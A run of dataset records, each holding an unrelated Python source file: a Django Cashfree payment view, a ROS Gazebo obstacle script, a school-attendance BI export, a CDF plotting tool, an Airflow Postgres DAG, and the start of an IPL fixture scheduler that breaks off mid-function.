status=status.HTTP_400_BAD_REQUEST)\n\n\n\n@api_view(http_method_names=['POST'])\n@permission_classes([IsAuthenticated])\ndef getOrderCashfree(request):\n cf_order_id = request.data.get('cf_order_id')\n\n try:\n purchase = Purchase.objects.get(booking_id=cf_order_id, user=request.user, payment_platform='Cashfree', is_active=True)\n url = f\"{settings.CASHFREE_ENDPOINT}/orders/{cf_order_id}/payments\"\n headers = {\n \"accept\": \"application/json\",\n \"x-client-id\": settings.CASHFREE_APP_ID,\n \"x-client-secret\": settings.CASHFREE_SECRET_KEY,\n \"x-api-version\": \"2023-08-01\",\n }\n response = 
requests.get(url=url, headers=headers)\n res_data = json.loads(response.text)[0]\n if(res_data['payment_status'] == \"SUCCESS\"):\n purchase.payment_status = 'PAID'\n purchase.payment_method = json.dumps(res_data['payment_method'])\n purchase.payment_id = res_data['cf_payment_id']\n purchase.schedule.seats_occupied = int(purchase.schedule.seats_occupied) + purchase.kids_selected.count()\n purchase.schedule.save()\n try:\n purchase.purchase_session.session_status = 'COMPLETED'\n purchase.purchase_session.save()\n except Exception as e:\n pass\n\n purchase.save()\n try:\n sendBookingConfirmationMail(\n user_email= purchase.user.email,\n user_first_name= purchase.user.first_name,\n course_name= purchase.course_level.to_course.name,\n level_name=purchase.course_level.name,\n booking_id=purchase.booking_id\n )\n print(\"CASHFREE\")\n except Exception as e:\n # print(e)\n pass\n response_data = {\n 'payment_status': \"SUCCESS\",\n 'purchase_data': PurchaseSerializer(purchase).data,\n 'plan_selected': PlansSerializer(purchase.plan_selected).data,\n }\n return Response(response_data, status=status.HTTP_200_OK)\n else:\n purchase.payment_status = 'FAILED'\n purchase.payment_id = res_data['cf_payment_id']\n purchase.save()\n response_data = {\n 'payment_status': \"FAILED\",\n 'order_status': res_data,\n 'order_detail': {\n 'payment_method' : purchase.payment_platform,\n 'payment_id': res_data['cf_payment_id'],\n 'order_id': purchase.booking_id,\n 'error_description': res_data['error_details']['error_description'],\n 'purchase_session_identifier': purchase.purchase_session.identifier,\n 'purchase_session_course': purchase.purchase_session.course_selected.slug,\n }\n \n }\n return Response(response_data, status=status.HTTP_200_OK)\n except Purchase.DoesNotExist:\n return Response({'error': 'Purchase Does Not Exists'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n@api_view(http_method_names=['POST'])\n@permission_classes([IsAuthenticated])\ndef CreatePurchaseSession(request):\n plan_selected = request.data.get('plan_selected')\n level_selected = request.data.get('level_selected')\n course_selected = request.data.get('course_selected')\n\n try:\n user = request.user\n except User.DoesNotExist:\n return Response({'error': 'Invalid user ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n level = Levels.objects.get(id=level_selected)\n except Levels.DoesNotExist:\n return Response({'error': 'Invalid course level ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n course = Course.objects.get(slug=course_selected)\n except Schedule.DoesNotExist:\n return Response({'error': 'Invalid schedule ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n plan = Plans.objects.get(id=plan_selected)\n except Plans.DoesNotExist:\n return Response({'error': 'Invalid plan selected ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n query_purchase_session = PurchaseSession.objects.filter(\n user=user,\n course_selected=course,\n plan_selected=plan,\n level_selected=level,\n session_status='INCOMPLETE'\n )\n if query_purchase_session.exists():\n query_purchase_session_serializer = PurchaseSessionSerializer(query_purchase_session.last())\n return Response({'purchase_session': query_purchase_session_serializer.data}, status=status.HTTP_200_OK)\n else:\n identifier = str(uuid.uuid4().hex[:16]) \n purchase_session = PurchaseSession.objects.create(\n user=user,\n course_selected=course,\n plan_selected=plan,\n level_selected=level,\n identifier=identifier.upper()\n ) \n purchase_session_serializer = 
PurchaseSessionSerializer(purchase_session)\n return Response({'purchase_session': purchase_session_serializer.data}, status=status.HTTP_201_CREATED)\n except Exception as e:\n return Response({'error': 'Some error ocurred.'}, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(http_method_names=['GET'])\n@permission_classes([IsAuthenticated])\ndef getPurchaseSession(request, identifier):\n try:\n purchase_session = PurchaseSession.objects.get(\n user=request.user,\n identifier=identifier,\n session_status='INCOMPLETE'\n ) \n purchase_session_serializer = PurchaseSessionSerializer(purchase_session)\n return Response({'purchase_session': purchase_session_serializer.data}, status=status.HTTP_200_OK)\n except PurchaseSession.DoesNotExist:\n return Response({'error': 'Some error ocurred.'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n","repo_name":"ArmaanChaand/GurufaBackend","sub_path":"purchase/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26266274040","text":"# import ros package\nimport rospy\nimport rospkg\nfrom gazebo_msgs.msg import ModelState\nfrom geometry_msgs.msg import Twist\nfrom gazebo_msgs.srv import *\n\n# import python package\nimport random\nimport math\nimport numpy as np\nfrom datetime import datetime\n\n\nclass environment():\n def __init__(self):\n self.model_state_x = {}\n self.model_state_y = {}\n self.drone_name = \"quadrotor\"\n # get the model name from the model name text file and store into list\n self.text_file = open(\"/home/iastaff/catkin_ws/src/drone/model_name.txt\", \"r\")\n self.model = self.text_file.readlines()\n self.model_name = [x.strip() for x in self.model]\n self.text_file.close()\n rospy.init_node('generate_model_pos')\n self.update_model_pos = rospy.Publisher(\"/gazebo/set_model_state\", ModelState, queue_size=1)\n self.get_model_pos = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)\n print (\"Finish init\")\n\n def get_obstacles_pos(self):\n self.model_pos = GetModelStateRequest()\n for i in range (len(self.model_name)):\n self.model_pos.model_name = self.model_name[i]\n self.model_state_all = self.get_model_pos(self.model_pos)\n self.model_state_x[i] = self.model_state_all.pose.position.x\n self.model_state_y[i] = self.model_state_all.pose.position.y\n print (\"Finish get obstacles position\")\n \n def set_obstacles_pos(self):\n self.set_state = ModelState()\n #set the forest environment\n for i in range (len(self.model_name)):\n self.set_state.model_name = self.model_name[i]\n # set pose\n self.set_state.pose.position.x = random.uniform(-50.0,50.0)\n self.set_state.pose.position.y = random.uniform(-50.0,50.0)\n self.set_state.pose.orientation.z = random.uniform(-50.0,50.0)\n self.update_model_pos.publish(self.set_state)\n self.model_state_x[i] = self.set_state.pose.position.x # update dict\n self.model_state_y[i] = self.set_state.pose.position.y # update dict\n print (\"update dict finish\")\n rospy.sleep(0.03) # provide buffer time to set model new position\n print (\"Finish reset {} position\".format(self.model_name[i]))\n print (\"{} x:{} y:{}\".format(self.model_name[i],self.set_state.pose.position.x,self.set_state.pose.position.y ))\n\n def set_drone_pos(self):\n self.set_state = ModelState()\n self.set_state.model_name = self.drone_name\n self.set_state.pose.position.x = 55.0\n self.set_state.pose.position.y = -55.0\n self.update_model_pos.publish(self.set_state)\n rospy.sleep(0.03) # provide 
buffer time to set drone position\n print (\"Finish reset {} position\".format(self.drone_name))\n print (\"{} x:{} y:{}\".format(self.drone_name,self.set_state.pose.position.x,self.set_state.pose.position.y ))\n\nif __name__ == \"__main__\":\n try:\n set_environment = environment()\n set_environment.get_obstacles_pos()\n set_environment.set_obstacles_pos()\n set_environment.set_drone_pos()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"Drone-FYP2021-PolyU-EIE/Gazebo-simulation","sub_path":"script/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"22639564842","text":"# This Python file uses the following encoding: utf-8\nfrom aula.apps.alumnes.models import Alumne, Curs\nfrom django.conf import settings\nimport csv\nimport os.path\nfrom aula.apps.usuaris.models import Professor\nfrom aula.apps.horaris.models import FranjaHoraria\nfrom aula.apps.presencia.models import ControlAssistencia\nfrom aula.apps.assignatures.models import Assignatura\nfrom django.utils.datetime_safe import datetime\nimport datetime as t\nfrom datetime import date\nimport hashlib\nfrom django.template.defaultfilters import slugify\n\n\n\n#Dims:\n# Alumnes: id, id_nivell, nivell, id_curs, curs, id_grup, grup,\n# Franja Horaria: id, nom, mati_tarda_vespre\n# Assignatures: id, nom\n# Professors: id, username, nom, cognoms\n# Data: dia, curs, any, mes, dia, trimestre\n#\n#Fact:\n# controls: n_classes,n_assistencies, n_faltes_totals, n_faltes_no_justificades, n_retards, n_justificades\n# incidencies: n_informatives, n_incidencies, n_expulsions, n_expulsions_centre\n# actuacions: n_actuacions_alumne, n_actuacions_familia\n# portal families: n_connexions, n_enviaments, t_resposta\n\ndef export_bi():\n '''\n \n create table alumnes (\n id int,\n nivell varchar(50),\n curs varchar(50),\n grup varchar(90),\n alumne_alias varchar(50),\n alumne_nom varchar(200),\n alumne_hash varchar(100)\n );\n\n create table dates (\n id int,\n data date,\n dia int,\n mes int,\n year int,\n setmana int \n );\n\n create table franges (\n id int,\n hora_inici varchar(20)\n );\n\n create table professors (\n id int,\n professor varchar(100),\n email varchar(100)\n ); \n\n create table assignatures (\n id int,\n assignatura varchar(200)\n ); \n\n create table controls (\n id int,\n alumne_id int,\n assignatura_id int,\n professor_id int,\n data_id int,\n franja_id int,\n n_total_classes int,\n n_de_classes int,\n n_assistencies int,\n n_faltes_totals int,\n n_faltes_no_justificades int,\n n_faltes_justificades int,\n n_retards int\n ); \n\n\n\n\n \n '''\n dim_alumnes()\n dim_assignatures()\n dim_franges() \n dim_professors()\n fact_controls()\n\n# Alumnes: id, id_nivell, nivell, id_curs, curs, id_grup, grup,\ndef dim_alumnes( ):\n file_name = os.path.join( settings.BI_DIR, 'alumnes.csv')\n ofile = open(file_name, 'wb')\n writer = csv.writer(ofile)\n for alumne in Alumne.objects.all():\n\n alumne_row = []\n alumne_row.append( any_inici_curs() )\n alumne_row.append( any_inici_curs() * 10000000 + alumne.pk )\n alumne_row.append( alumne.grup.curs.nivell.pk )\n alumne_row.append( alumne.grup.curs.nivell.nom_nivell )\n alumne_row.append( alumne.grup.curs.pk )\n alumne_row.append( alumne.grup.curs.nom_curs )\n alumne_row.append( alumne.grup.pk )\n alumne_row.append( alumne.grup.descripcio_grup )\n alumne_row.append( 'alumne'+str( alumne.pk ) )\n alumne_row.append( alumne.cognoms + ', '+ alumne.nom 
)\n writer.writerow( alumne_row ) \n \n ofile.close() \n\n# Franja Horaria: id, nom, mati_tarda_vespre \ndef dim_franges( ):\n file_name = os.path.join( settings.BI_DIR, 'franges.csv')\n ofile = open(file_name, 'wb')\n writer = csv.writer(ofile)\n for element in FranjaHoraria.objects.all():\n\n element_row = []\n element_row.append( any_inici_curs() )\n element_row.append( any_inici_curs() * 10000000 + element.pk )\n element_row.append( element.hora_inici )\n element_row.append( element.hora_fi )\n element_row.append( element.nom_franja )\n writer.writerow( element_row ) \n \n ofile.close() \n\n# Professors: id, username, nom, cognoms \ndef dim_professors( ):\n file_name = os.path.join( settings.BI_DIR, 'professors.csv')\n ofile = open(file_name, 'wb')\n writer = csv.writer(ofile)\n for element in Professor.objects.all():\n\n element_row = []\n element_row.append( any_inici_curs() )\n element_row.append( any_inici_curs() * 10000000 + element.pk )\n element_row.append( element.username )\n element_row.append( element.first_name )\n element_row.append( element.last_name )\n writer.writerow( element_row ) \n \n ofile.close() \n \n# Assignatures: id, nom\ndef dim_assignatures( ): \n file_name = os.path.join( settings.BI_DIR, 'assignatures.csv')\n ofile = open(file_name, 'wb')\n writer = csv.writer(ofile)\n for element in Assignatura.objects.all():\n\n element_row = []\n element_row.append( any_inici_curs() )\n element_row.append( any_inici_curs() * 10000000 + element.pk )\n element_row.append( element.codi_assignatura )\n writer.writerow( element_row ) \n \n ofile.close() \n\n# Data: dia, curs, any, mes, dia, trimestre \n\n\n#---------------------------------------------------------- DADES per a BI -----------------------------------------------------\n# controls: n_classes,n_assistencies, n_faltes_totals, n_faltes_no_justificades, n_retards, n_justificades\ndef fact_controls( n = -1 , flag_impersona = False ): \n debug = n\n file_name = os.path.join( settings.BI_DIR, 'controls.csv')\n ofile = open(file_name, 'wb')\n writer = csv.writer(ofile)\n \n element_row = []\n \n element_row.append( 'any_inici_curs') \n element_row.append( 'data') \n element_row.append( 'alumne_disociat' )\n element_row.append( 'nom' )\n element_row.append( 'nom_nivell' )\n element_row.append( 'nom_curs' )\n element_row.append( 'descripcio_grup' )\n element_row.append( 'codi_assignatura' )\n \n #franja\n element_row.append( 'hora_inici' )\n element_row.append( 'hora_fi' )\n \n #professor \n element_row.append( 'professor' )\n element_row.append( 'email' )\n \n #facts --- \n element_row.append( 'n_total_classes' )\n element_row.append( 'n_de_classes' )\n element_row.append( 'n_assistencies' )\n element_row.append( 'n_faltes_totals' )\n element_row.append( 'n_faltes_no_justificades' )\n element_row.append( 'n_faltes_justificades' )\n element_row.append( 'n_retards' )\n\n writer.writerow( element_row ) \n\n tots_els_controls_assistencia = ( ControlAssistencia\n .objects\n .exclude( alumne__data_baixa__isnull = False )\n .values_list('id', flat=True)\n .order_by( 'impartir__dia_impartir' )\n )\n \n for pk in tots_els_controls_assistencia:\n element = ControlAssistencia.objects.get( pk = pk )\n debug -= 1\n if debug == 0:\n break\n element_row = []\n \n #any_inici_curs\n element_row.append( any_inici_curs() )\n \n #data\n element_row.append( element.impartir.dia_impartir )\n \n #alumne_disociat\n element_row.append( '{0}-{1}'.format( any_inici_curs() , element.alumne.pk ) )\n\n #alumne\n cognoms_nom = element.alumne.cognoms 
+ u', '+ element.alumne.nom\n        if flag_impersona:\n            cognoms_nom = hashlib.sha224( slugify( cognoms_nom ) ).hexdigest()\n        element_row.append( slugify(cognoms_nom ) )\n\n        #nivell\n        element_row.append( element.alumne.grup.curs.nivell.nom_nivell )\n        \n        #curs\n        element_row.append( element.alumne.grup.curs.nom_curs )\n        \n        #grup\n        element_row.append( element.alumne.grup.descripcio_grup )\n        \n        #assignatura\n        element_row.append( element.impartir.horari.assignatura.codi_assignatura )\n        \n        #franja\n        element_row.append( element.impartir.horari.hora.hora_inici )\n        element_row.append( element.impartir.horari.hora.hora_fi )\n        \n        #professor \n        element_row.append( element.impartir.professor_passa_llista.username if element.impartir.professor_passa_llista else \n                                element.impartir.horari.professor.username )\n        \n        element_row.append( element.impartir.professor_passa_llista.email if element.impartir.professor_passa_llista else \n                                element.impartir.horari.professor.email )\n        \n        #facts ---\n        nTotalDeClasses = 1 \n        element_row.append( nTotalDeClasses )\n\n        nDeClasses = 1 if element.estat is not None else 0\n        element_row.append( nDeClasses )\n        \n        nAssistencies = 1 if element.estat is not None and element.estat.codi_estat in ( 'P','R','O') else 0\n        element_row.append( nAssistencies )\n        \n        nFaltesTotes = 1 if element.estat is not None and element.estat.codi_estat in ( 'F','J') else 0\n        element_row.append( nFaltesTotes )\n        \n        nFaltesNoJustificades = 1 if element.estat is not None and element.estat.codi_estat in ( 'F') else 0\n        element_row.append( nFaltesNoJustificades )\n        \n        nFaltesJustificades = 1 if element.estat is not None and element.estat.codi_estat in ( 'J') else 0\n        element_row.append( nFaltesJustificades )\n        \n        nRetards = 1 if element.estat is not None and element.estat.codi_estat in ( 'R') else 0\n        element_row.append( nRetards )\n\n        writer.writerow( element_row ) \n    \n    ofile.close()\n    \n\n\n#-------------------------------------------- Data for the \"I'm feeling lucky\" export ---------------------------------------\ndef fact_controls_dissociats( n=-1 ): \n    debug = n\n    file_name = os.path.join( settings.BI_DIR, 'controls_dissociats.csv')\n    ofile = open(file_name, 'wb')\n    writer = csv.writer(ofile)\n    \n    element_row = []\n    \n    columnes = [ \n            'nom_nivell' ,\n            'hora_inici' ,\n            'assistenciaMateixaHora1WeekBefore' ,\n            'assistenciaMateixaHora2WeekBefore' ,\n            'assistenciaMateixaHora3WeekBefore' ,\n            'assistenciaaHoraAnterior' ,\n            'assistencia' ]\n    for c in columnes:\n        element_row.append( c )\n    writer.writerow( element_row ) \n    \n    pks = ( ControlAssistencia\n                .objects\n                .exclude( alumne__data_baixa__isnull = False )\n                .filter(\n                    impartir__dia_impartir__lt = datetime.today(),\n                    impartir__dia_impartir__gt = date( year = 2012, month = 10, day = 1 ) \n                        )\n                .values_list('id', flat=True)\n                .order_by( 'impartir__dia_impartir' )\n             )\n    \n    for pk in pks:\n        element = ControlAssistencia.objects.get( pk = pk )\n        debug -= 1\n        if debug == 0:\n            break\n\n        row = []\n        \n        dades = dades_dissociades(element) \n        for c in columnes:\n            row.append( dades[c] )\n        writer.writerow( row ) \n    \n    ofile.close()\n    \ndef dades_dissociades( element ):\n\n    element_dict = {}\n    \n    element_dict['nom_nivell'] = element.alumne.grup.curs.nivell.nom_nivell \n    \n    element_dict['hora_inici'] = element.impartir.horari.hora.hora_inici \n    \n    #previous weeks\n    fa1Setmana = element.impartir.dia_impartir - t.timedelta( days = 7 )\n    fa2Setmana = element.impartir.dia_impartir - t.timedelta( days = 14 )\n    fa3Setmana = element.impartir.dia_impartir - t.timedelta( days = 21 )\n    \n    try:\n
        elementfa1Setmana = ControlAssistencia.objects.filter( \n                                        alumne = element.alumne,\n                                        impartir__horari__hora = element.impartir.horari.hora, \n                                        impartir__dia_impartir = fa1Setmana, \n                                        impartir__horari__assignatura = element.impartir.horari.assignatura )\n    except ControlAssistencia.DoesNotExist:\n        elementfa1Setmana = None\n    esFaltaMateixaHora1WeekBefore = PresenciaQuerySet( elementfa1Setmana )\n\n    try:\n        elementfa2Setmana = ControlAssistencia.objects.filter( \n                                        alumne = element.alumne, \n                                        impartir__horari__hora = element.impartir.horari.hora, \n                                        impartir__dia_impartir = fa2Setmana, \n                                        impartir__horari__assignatura = element.impartir.horari.assignatura )\n    except ControlAssistencia.DoesNotExist:\n        elementfa2Setmana = None\n    esFaltaMateixaHora2WeekBefore = PresenciaQuerySet( elementfa2Setmana )\n\n    try:\n        elementfa3Setmana = ControlAssistencia.objects.filter( \n                                        alumne = element.alumne, \n                                        impartir__horari__hora = element.impartir.horari.hora, \n                                        impartir__dia_impartir = fa3Setmana, \n                                        impartir__horari__assignatura = element.impartir.horari.assignatura )\n    except ControlAssistencia.DoesNotExist:\n        elementfa3Setmana = None\n    esFaltaMateixaHora3WeekBefore = PresenciaQuerySet( elementfa3Setmana )\n\n    element_dict['assistenciaMateixaHora1WeekBefore'] = esFaltaMateixaHora1WeekBefore \n    element_dict['assistenciaMateixaHora2WeekBefore'] = esFaltaMateixaHora2WeekBefore \n    element_dict['assistenciaMateixaHora3WeekBefore'] = esFaltaMateixaHora3WeekBefore \n\n    #---One hour before (the window actually spans the previous 100 minutes)\n    unaHora40abans = add_secs_to_time(element.impartir.horari.hora.hora_inici, -100*60)\n\n    controls_anteriors = ControlAssistencia.objects.filter(\n                        alumne = element.alumne, \n                        impartir__horari__hora__hora_inici__lt = element.impartir.horari.hora.hora_inici,\n                        impartir__horari__hora__hora_inici__gt = unaHora40abans,\n                        impartir__dia_impartir = element.impartir.dia_impartir ) \n    \n\n    \n    esFaltaHoraAnterior = PresenciaQuerySet( controls_anteriors )\n    \n    element_dict['assistenciaaHoraAnterior'] = esFaltaHoraAnterior \n\n    esFalta = CalculaFalta( element )\n    \n    element_dict['assistencia'] = esFalta \n    \n    return element_dict\n    \ndef CalculaFalta( element ):\n\n    if element and element.estat is not None:\n        if element.estat.codi_estat in ( 'P','R','O'):\n            esFalta = 'Present' \n        else:\n            esFalta = 'Absent'\n    else:\n        esFalta = 'NA'\n    \n    return esFalta\n\ndef PresenciaQuerySet( qs ):\n    if qs is not None and qs.filter( estat__isnull = False ).exists():\n        if qs.filter( estat__codi_estat__in = ['P','R'] ):\n            esFaltaAnterior = 'Present'\n        elif qs.filter( estat__codi_estat__in = ['O'] ):\n            esFaltaAnterior = 'Online'\n        else:\n            esFaltaAnterior = 'Absent'\n    else:\n        esFaltaAnterior = 'NA'\n    return esFaltaAnterior\n\n\n#------------\n\ndef any_inici_curs():\n    return Curs.objects.filter( data_inici_curs__isnull = False )[0].data_inici_curs.year\n\n    \ndef add_secs_to_time(timeval, secs_to_add):\n    import datetime\n    dummy_date = datetime.date(1, 1, 1)\n    full_datetime = datetime.datetime.combine(dummy_date, timeval)\n    added_datetime = full_datetime + datetime.timedelta(seconds=secs_to_add)\n    return added_datetime.time() \n    \n    ","repo_name":"ctrl-alt-d/django-aula","sub_path":"aula/apps/BI/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16002,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"2"} +{"seq_id":"14389418320","text":"import json\nimport sys\nfrom itertools import cycle\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# noinspection 
SpellCheckingInspection\nEXAMPLE_CTRL_JSON = \"\"\"######### EXAMPLE JSON: #########\n{\n    \"title\": \"cdf figure\", \n    \"x_label\": \"VAR X\", \n    \"y_label\": \"\", \n    \"save_path\": \"./cdf.pdf\", \n    \"show_figure\": false, \n    \"data\": [\n        {\n            \"legend\": \"Baseline\", \n            \"csv_path\": \"./similarity_score.csv\", \n            \"col_name\": \"baseline\", \n            \"sample_range\": [0, 1.002, 0.001], \n            \"count_out_of_range_data\": true,\n            \"out_of_range_data_as\": 0\n        }, \n        {\n            \"legend\": \"Tor\", \n            \"csv_path\": \"./similarity_score.csv\", \n            \"col_name\": \"torsocks\", \n            \"sample_range\": [0, 1.002, 0.001], \n            \"count_out_of_range_data\": true,\n            \"out_of_range_data_as\": 0\n        }\n    ]\n}\n\"\"\"\n\n\n# noinspection SpellCheckingInspection\ndef set_plot_options():\n    options = {\n        # 'backend': 'PDF',\n        'font.size': 14,\n        'figure.figsize': (4, 2.67),\n        'figure.dpi': 100.0,\n        'figure.subplot.left': 0.20,\n        'figure.subplot.right': 0.97,\n        'figure.subplot.bottom': 0.20,\n        'figure.subplot.top': 0.90,\n        'grid.color': '0.1',\n        'grid.linestyle': ':',\n        # 'grid.linewidth': 0.5,\n        'axes.grid': True,\n        # 'axes.grid.axis' : 'y',\n        # 'axes.axisbelow': True,\n        'axes.titlesize': 'x-small',\n        'axes.labelsize': 'small',\n        'axes.formatter.limits': (-4, 4),\n        'xtick.labelsize': 10,\n        'ytick.labelsize': 10,\n        'lines.linewidth': 2.0,\n        'lines.markeredgewidth': 0.5,\n        'lines.markersize': 4,\n        'legend.fontsize': 9,\n        'legend.fancybox': False,\n        'legend.shadow': False,\n        'legend.borderaxespad': 0.5,\n        'legend.numpoints': 1,\n        'legend.handletextpad': 0.5,\n        'legend.handlelength': 2.0,\n        'legend.labelspacing': .25,\n        'legend.markerscale': 1.0,\n        # turn on the following to embed fonts; requires latex\n        'ps.useafm': True,\n        'pdf.use14corefonts': True,\n        'text.usetex': True,\n    }\n    for option_key in options:\n        matplotlib.rcParams[option_key] = options[option_key]\n    if 'figure.max_num_figures' in matplotlib.rcParams:\n        matplotlib.rcParams['figure.max_num_figures'] = 50\n    if 'figure.max_open_warning' in matplotlib.rcParams:\n        matplotlib.rcParams['figure.max_open_warning'] = 50\n    if 'legend.ncol' in matplotlib.rcParams:\n        matplotlib.rcParams['legend.ncol'] = 50\n\n\ndef data_prepare(df_path, col_name, sample_range, count_out_of_range_data=False, out_of_range_data_as=None):\n    \"\"\"\n    sample_range = [start, end, interval], start can be left, end can be right if all data are included.\n    count_out_of_range_data = True if out of range data are counted in Denominator\n    \"\"\"\n    df = pd.read_csv(df_path)\n    df = df[col_name]\n    ori_len = len(df)\n    if out_of_range_data_as is not None:\n        df = df.fillna(float(out_of_range_data_as))\n    df = df[df >= sample_range[0]] if sample_range[0] != 'left' else df\n    df = df[df <= sample_range[1]] if sample_range[1] != 'right' else df\n    new_len = len(df)\n    total_len = ori_len if count_out_of_range_data else new_len\n    res = []\n    threshold = sample_range[0]\n    while threshold <= sample_range[1]:\n        num_target = len(df[df <= threshold])\n        res.append({\"var\": threshold, \"cd\": num_target / total_len})\n        threshold += sample_range[2]\n    return res\n\n\ndef parse_cmd(json_path):\n    with open(json_path, 'r') as f:\n        commands = json.load(f)\n    data_list = []\n    legend_list = []\n    for data_single in commands['data']:\n        print(data_single)\n        if \"out_of_range_data_as\" in data_single:\n            out_of_range_data_as = data_single['out_of_range_data_as']\n        else:\n            out_of_range_data_as = None\n        dl = data_prepare(data_single['csv_path'],data_single['col_name'],data_single['sample_range'], \n                          count_out_of_range_data=data_single['count_out_of_range_data'], out_of_range_data_as=out_of_range_data_as)\n        data_list.append(dl)\n        legend_list.append(data_single['legend'])\n    cdf_plot(data_list, legend_list, commands['title'], commands['save_path'], xlabel=commands['x_label'],\n             ylabel=commands['y_label'],\n             show_figure=commands['show_figure'])\n\n\n# noinspection SpellCheckingInspection\ndef cdf_plot(res_data_list, legend_list, title, save_path, xlabel=\"\", ylabel=\"\", show_figure=True):\n    set_plot_options()\n    lines = [\"-\", \"--\", \"-.\", \":\"]\n    linecycler = cycle(lines)\n    # collect the plot handles in a list so they can be passed to plt.legend()\n    handles = []\n    for res in res_data_list:\n        x_direct = [r['var'] for r in res]\n        y_direct = [r['cd'] for r in res]\n        handle, = plt.plot(x_direct, y_direct, linestyle=next(linecycler))\n        handles.append(handle)\n    if len(xlabel) > 0:\n        plt.xlabel(xlabel)\n    if len(ylabel) > 0:\n        plt.ylabel(ylabel)\n    if len(title) > 0:\n        plt.title(title)\n    plt.legend(handles, legend_list)\n    axes = plt.gca()\n    # axes.set_xlim([xmin,xmax])\n    axes.set_ylim([0, 1])\n    plt.savefig(save_path)\n    if show_figure:\n        plt.show()\n\n\ndef generate_example_json():\n    print(EXAMPLE_CTRL_JSON)\n\n\ndef main():\n    if len(sys.argv) != 2:\n        print(\"Usage: cdf_plot path/to/conf.json\")\n        exit()\n    if sys.argv[1] == '-g':\n        generate_example_json()\n    else:\n        parse_cmd(sys.argv[1])\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"zz090923610/gpef","sub_path":"gpef/graphic/cdf_plot.py","file_name":"cdf_plot.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41431436957","text":"import uuid\nimport logging\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.python import PythonOperator\nfrom airflow.operators.dummy import DummyOperator\nfrom airflow.operators.python_operator import BranchPythonOperator\nfrom airflow.operators.bash import BashOperator\nfrom airflow.models.xcom import XCom\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.operators.postgres_operator import PostgresOperator\nfrom airflow.utils.trigger_rule import TriggerRule\nfrom custom_operator.postgres_operator import PostgreSQLCountRows\n\n\nconfig = {\n   'dag_id_1': {'schedule_interval': None, \n                'start_date': datetime(2022, 11, 11),\n                'table_name': 'table_name_1'}, \n   'dag_id_2': {'schedule_interval': None, \n                'start_date': datetime(2018, 11, 11),\n                'table_name': 'table_name_2'}, \n   'dag_id_3':{'schedule_interval': None, # changed from '@daily'\n                'start_date': datetime(2018, 11, 11),\n                'table_name': 'table_name_3'}\n   }\n\n# branching function\ndef check_table_exist(sql_to_check_table_exist, table_name):\n    \"\"\" callable function to get schema name and after that check if table exist \"\"\" \n    hook = PostgresHook()\n    schema = 'public'\n\n    # check table exist\n    query = hook.get_first(sql=sql_to_check_table_exist.format(schema, table_name))\n    print(query)\n\n    if query:\n        return 'insert_row'\n    else:\n        logging.info(f\"table {table_name} does not exist\")\n        return 'create_table' \n\ndef log_information(dag_id, database):\n    logging.info(f'{dag_id} start processing tables in database: {database}')\n\nfor id, dict in 
config.items():\n with DAG(id, start_date=dict['start_date'], schedule_interval=dict['schedule_interval']) as dag:\n start = PythonOperator(\n task_id='print_process_start',\n python_callable=log_information,\n op_kwargs={'dag_id': id, 'database': 'public'},\n queue='queue_capstone'\n )\n\n get_user = BashOperator(\n task_id=\"get_current_user\",\n bash_command=\"whoami\",\n queue='queue_capstone'\n )\n\n table_name = \"table_name\"\n check = BranchPythonOperator(task_id='check_table_exists',\n python_callable=check_table_exist,\n op_args=[\"SELECT * FROM information_schema.tables \"\n \"WHERE table_schema = '{}'\"\n \"AND table_name = '{}';\", table_name],\n queue='queue_capstone')\n \n sql_create_table = '''CREATE TABLE table_name(custom_id integer NOT NULL, \n user_name VARCHAR (50) NOT NULL, timestamp TIMESTAMP NOT NULL);'''\n create = PostgresOperator(task_id='create_table',\n postgres_conn_id='postgres_default',\n sql=sql_create_table,\n queue='queue_capstone')\n\n custom_id_value = uuid.uuid4().int % 123456789\n timestamp_value = datetime.now()\n insert = PostgresOperator(task_id='insert_row',\n postgres_conn_id='postgres_default',\n sql='''INSERT INTO table_name VALUES(%s, '{{ ti.xcom_pull(task_ids='get_current_user', key='return_value') }}', %s);''',\n parameters=(custom_id_value, timestamp_value),\n trigger_rule='all_done',\n queue='queue_capstone')\n\n query = PostgreSQLCountRows(task_id='query_table',\n postgres_conn_id='postgres_default',\n table_name='table_name',\n queue='queue_capstone')\n\n start >> get_user\n get_user >> check \n check >> [create, insert]\n create >> insert\n insert >> query","repo_name":"karenbocardo/airflow","sub_path":"dags/jobs_dag.py","file_name":"jobs_dag.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4695729029","text":"import itertools\nfrom datetime import datetime,timedelta\n\nprint(\"IPL Schedule 2023\")\n\n\ndef schedule_matches(teams, start_date):\n num_teams = len(teams)\n num_rounds = (num_teams - 1)\n\n fixtures = []\n match_date = start_date.replace(hour=14, minute=30)\n \n for round_num in range(num_rounds):\n round_fixtures = []\n for i in range(num_teams // 2):\n home = teams[i]\n away = teams[num_teams - 1 -i]\n round_fixtures.append((home, away , match_date))\n match_date += timedelta(hours = 5) # Increase time by 5 hours \n match_date += timedelta(days = 1)\n # Move to the next day\n \n \n \n \n fixtures.append(round_fixtures)\n teams.insert(1, teams.pop())\n\n \n \n return fixtures\n\n# 